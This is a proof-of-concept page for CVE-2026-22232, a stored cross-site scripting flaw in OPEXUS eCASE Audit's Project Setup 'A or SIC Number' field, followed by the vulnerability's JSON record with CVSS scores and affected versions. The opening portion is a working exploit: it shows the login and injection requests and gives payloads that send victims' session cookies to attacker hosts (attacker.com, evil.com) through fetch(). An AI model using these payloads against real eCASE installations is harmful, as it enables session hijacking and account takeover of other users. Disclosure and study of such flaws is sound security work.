CVE-2026-22232

// CVE-2026-22232 Stored XSS PoC // Target: OPEXUS eCASE Audit - Project Setup // Field: A or SIC Number // Step 1: Authenticate with low-privilege account // POST /api/auth/login // Body: {"username": "attacker", "password": "password123"} // Step 2: Navigate to Project Setup and inject XSS payload // POST /api/project/setup // Body: { // "project_id": "PROJECT-001", // "a_or_sic_number": "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>", // "description": "Test Project" // } // Step 3: When other users view the project, the script executes automatically // Simple alert PoC: var xss_payload = '<script>alert("XSS by CVE-2026-22232")</script>'; // Or cookie stealing payload: var cookie_stealer = '<img src=x onerror="fetch(\'https://evil.com/log?c=\'+btoa(document.cookie))">';

{"cve": {"id": "CVE-2026-22232", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2026-01-08T18:16:00.063", "lastModified": "2026-02-05T19:24:46.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript in the \"A or SIC Number\" field within the Project Setup functionality. The JavaScript is executed whenever another user views the project. Fixed in OPEXUS eCASE Audit 11.14.2.0."}, {"lang": "es", "value": "OPEXUS eCASE Audit permite a un atacante autenticado guardar JavaScript en el campo 'A or SIC Number' dentro de la funcionalidad de Configuración de Proyecto. El JavaScript se ejecuta cada vez que otro usuario ve el proyecto. Corregido en OPEXUS eCASE Audit 11.14.2.0."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opexustech:ecase_audit:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.14.2.0", "matchCriteriaId": "5A4D2029-9D59-4E65-B116-7405E4D37F4F"}]}]}], "references": [{"url": "https://docs.opexustech.com/docs/oig/audit/eCase_Audit_Release_Notes_11.14.2.0.pdf", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Release Notes"]}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-26-008-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Broken Link"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-22232", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}]}}